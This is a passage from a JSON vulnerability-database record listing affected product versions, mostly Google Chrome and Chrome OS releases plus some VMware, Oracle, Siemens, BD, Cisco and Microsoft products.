        "trust": 0.3,
        "vendor": "google",
        "version": "5.0.335.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "4.1.249.1030"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "27.0.1453.8"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "10.0.648.132"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "18.0.1025.51"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "8.0.552.336"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "21.0.1180.32"
      },
      {
        "model": "vsphere data protection",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "vmware",
        "version": "6.1"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "10.0.602.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "8.0.552.211"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "21.0.1180.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "13.0.750.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "33.0.1750.16"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "19.0.1049.2"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "8.0.552.104"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "37.0.2062.72"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "28.0.1500.18"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "19.0.1058.1"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "9.0.597.79"
      },
      {
        "model": "sql server for x64-based systems service pack",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "microsoft",
        "version": "201240"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "6.0.415.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "17.0.931.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "12.0.742.115"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "12.0.722.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "31.0.1650.60"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "20.0.1132.32"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "21.0.1180.1"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "7.0.520.0"
      },
      {
        "model": "vm virtualbox",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "oracle",
        "version": "5.1.32"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "24.0.1312.35"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "4.1.249.1022"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "10.0.651.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "23.0.1271.31"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "14.0.835.109"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "6.0.476.0"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "26.0.1410.38"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "6.0.472.61"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "10.0.648.124"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "28.0.1500.44"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "3.0.195.37"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "19.0.1055.2"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "32.0.1670.1"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "5.0.354.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "9.0.597.38"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "4.0.222.12"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "31.0.1650.33"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "11.0.690.1"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "12.0.742.75"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "17.0.963.42"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "9.0.597.73"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "9.0.597.64"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "9.0.570.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "6.0.472.22"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "5.0.347.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "16.0.912.13"
      },
      {
        "model": "vsphere integrated containers",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "vmware",
        "version": "1.2"
      },
      {
        "model": "sinumerik d sl ncu730.3",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "siemens",
        "version": "840"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "3.0.195.24"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "8.0.552.47"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "37.0.2062.90"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "35.0.1916.98"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "30.0.1599.44"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "27.0.1453.10"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "22.0.1229.11"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "8.0.552.344"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "6.0.412.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.44"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "14.0.835.27"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "10.0.634.1"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "5.0.329.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "22.0.1229.1"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.72"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "19.0.1085.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "11.0.664.1"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "32.0.1700.26"
      },
      {
        "model": "sinumerik d sl ncu730.3b",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "siemens",
        "version": "840"
      },
      {
        "model": "lsr ii",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "bd",
        "version": "0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "34.0.1847.83"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "9.0.596.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "6.0.472.32"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "11.0.696.46"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "14.0.835.103"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "14.0.835.113"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "24.0.1312.53"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "5.0.375.47"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "5.0.375.69"
      },
      {
        "model": "unified computing system",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "3.1"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "12.0.730.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "19.0.1060.0"
      },
      {
        "model": "pyxis supply roller",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "bd",
        "version": "0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "23.0.1271.40"
      },
      {
        "model": "facscount",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "bd",
        "version": "0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "10.0.610.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "6.0.422.0"
      },
      {
        "model": "windows server",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "microsoft",
        "version": "20160"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "11.0.696.48"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "27.0.1453.43"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "22.0.1229.24"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "15.0.874.116"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "4.0.299.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "33.0.1750.3"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.31"
      },
      {
        "model": "linux amd64",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "debian",
        "version": "6.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "19.0.1036.3"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "12.0.742.41"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "12.0.742.19"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "5.0.371.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "32.0.1700.56"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "26.0.1410.48"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "32.0.1668.6"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "13.0.782.107"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "10.0.615.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "9.0.599.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "14"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "21.0.1180.41"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "18.0.1025.99"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "30.0.1599.51"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "6.0.452.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "27.0.1453.102"
      },
      {
        "model": "enterprise mrg",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "redhat",
        "version": "2"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "17.0.963.12"
      },
      {
        "model": "vm virtualbox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "oracle",
        "version": "5.2.4"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "35.0.1916.92"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "26.0.1410.6"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.24"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "32.0.1675.2"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "16.0.912.30"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "11.0.696.50"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "20.0.1132.8"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "2.0.172.28"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "15.0.873.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "4.0.301.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "27.0.1453.116"
      },
      {
        "model": "vrealize automation",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "vmware",
        "version": "6.2.5"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "5.0.366.4"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "14.0.794.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "7.0.517.42"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "21.0.1180.53"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "30.0.1599.40"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "20.0.1132.35"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "13.0.781.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "53.0.2785.143"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "5.0.375.60"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "37.0.2062.34"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "24.0.1298.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "2.0.157.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "34.0.1847.134"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "14.0.835.18"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.7"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "12.0.742.72"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "14.0.835.34"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "8.0.554.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "19.0.1084.45"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "13.0.775.1"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "28.0.1500.71"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "19.0.1084.13"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "28.0.1500.36"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "12.0.742.59"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "20.0.1132.7"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "10.0.631.0"
      },
      {
        "model": "communications lsms",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "oracle",
        "version": "13.2"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.125"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "27.0.1453.114"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "14.0.835.102"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.54"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "6.0.477.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "17.0.941.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "5.0.335.3"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "5.0.375.65"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "11.0.696.35"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "7.0.516.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "6.0.430.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "32.0.1684.2"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "5.0.375.11"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "30.0.1599.37"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "6.0.457.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "24.0.1289.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "19.0.1084.48"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "18.0.1008.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "17.0.943.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "35.0.1916.6"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "28.0.1500.21"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "10.0.609.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "12.0.742.114"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364160"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "4.0.211.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "18.0.1025.42"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "5.0.342.4"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "9.0.582.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "16.0.912.63"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "9.0.589.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "17.0.963.41"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "26.0.1410.43"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "31.0.1650.4"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "30.0.1599.90"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "9.0.575.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "32.0.1671.8"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "32.0.1663.1"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "22.0.1229.26"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "5.0.356.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "29.0.1547.33"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "24.0.1280.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "13.0.782.84"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "24.0.1312.21"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.57"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "19.0.1084.30"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.122"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "17.0.963.39"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "23.0.1271.37"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "5.0.375.95"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "5.0.375.57"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "32.0.1700.74"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "12.0.726.0"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.73"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "33.0.1750.5"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "5.0.375.84"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "11.0.667.3"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "20.0.1132.3"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "19.0.1034.0"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.56"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "17.0.963.81"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "1.0.154.36"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "60.0.3112.80"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "15.0.874.22"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "18.0.1025.112"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "3.0.195.32"
      },
      {
        "model": "rowa dose",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "bd",
        "version": "0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "12.0.716.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "6.0.480.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "6.0.466.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "15.0.874.45"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "21.0.1180.54"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "12.0.700.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "7.0.517.28"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.154"
      },
      {
        "model": "xen",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "xen",
        "version": "0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "32.0.1684.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "30.0.1599.14"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "6.0.466.1"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "27.0.1453.5"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "24.0.1312.48"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "12.0.742.82"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "11.0.696.21"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "32.0.1652.1"
      },
